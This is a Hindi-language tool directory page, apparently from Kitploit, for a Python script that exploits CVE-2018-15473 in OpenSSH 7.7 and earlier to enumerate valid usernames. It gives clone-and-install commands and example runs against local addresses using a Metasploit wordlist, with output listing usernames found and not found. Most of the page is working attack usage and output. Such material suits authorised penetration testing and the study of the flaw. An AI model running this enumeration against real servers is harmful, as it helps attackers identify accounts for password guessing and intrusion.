Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/epi052/cve-2018-15473
टोहीभेद्यता विश्लेषणशोषणजानकारी एकत्र करनानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंग
GitHubepi052/cve-2018-15473

cve-2018-15473

बहु-थ्रेडेड, IPv6-जागरूक, शब्दसूचियाँ/एकल-उपयोगकर्ता उपयोगकर्तानाम गणना CVE-2018-15473 के माध्यम से

रिपॉजिटरी देखें
1163172 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-15473

OpenSSH 7.7 तक के संस्करण एक उपयोगकर्ता गणना भेद्यता के प्रति संवेदनशील है, क्योंकि यह किसी अमान्य प्रमाणीकरण करने वाले उपयोगकर्ता के लिए बेलआउट में देरी नहीं करता है जब तक कि अनुरोध वाले पैकेट को पूरी तरह से पार्स नहीं कर लिया जाता। यह auth2-gss.c, auth2-hostbased.c, और auth2-pubkey.c से संबंधित है।

स्थापना

आपको अपने डिस्ट्रो के समतुल्य openssl-dev पैकेज स्थापित करने की आवश्यकता हो सकती है

# नोट: यदि आप काली पर इंस्टॉल कर रहे हैं, तो आप pip install छोड़ सकते हैं; paramiko पहले से मौजूद है।

git clone https://gitlab.com/epi052/cve-2018-15473.git
cd cve-2018-15473
pip install -r requirements.txt 
# - या - 
pipenv install -r requirements.txt  # यदि आप ऐसे कूल हैं
chmod u+x ssh-username-enum.py

उदाहरण

एक एकल उपयोगकर्ता नाम

(cve-2018-15473)─> ./ssh-username-enum.py -u epi 192.168.1.2
[+] epi मिला!

10 थ्रेड के साथ एक वर्डलिस्ट का उपयोग करें (डिफ़ॉल्ट 4 है)

(cve-2018-15473)─> ./ssh-username-enum.py -t 10 -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt 192.168.1.2
[+] avahi मिला!
[+] avahi-autoipd मिला!
[+] backup मिला!
[+] daemon मिला!
[+] bin मिला!
------8<------

पोर्ट 2222 पर IPv6 पता और बढ़ी हुई वर्बोसिटी!

(cve-2018-15473)─> ./ssh-username-enum.py -6 -p 2222 -v -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt '::1'
[-] 4Dgifts नहीं मिला
[-] demo नहीं मिला
[-] checkfs नहीं मिला
[-] anon नहीं मिला
[-] EZsetup नहीं मिला
[-] auditor नहीं मिला
[-] demos नहीं मिला
[-] OutOfBox नहीं मिला
[-] checkfsys नहीं मिला
[+] avahi मिला!
[-] diag नहीं मिला
[-] ROOT नहीं मिला
[-] checksys नहीं मिला
[-] cmwlogin नहीं मिला
[+] avahi-autoipd मिला!
------8<------
टूल डाउनलोड करें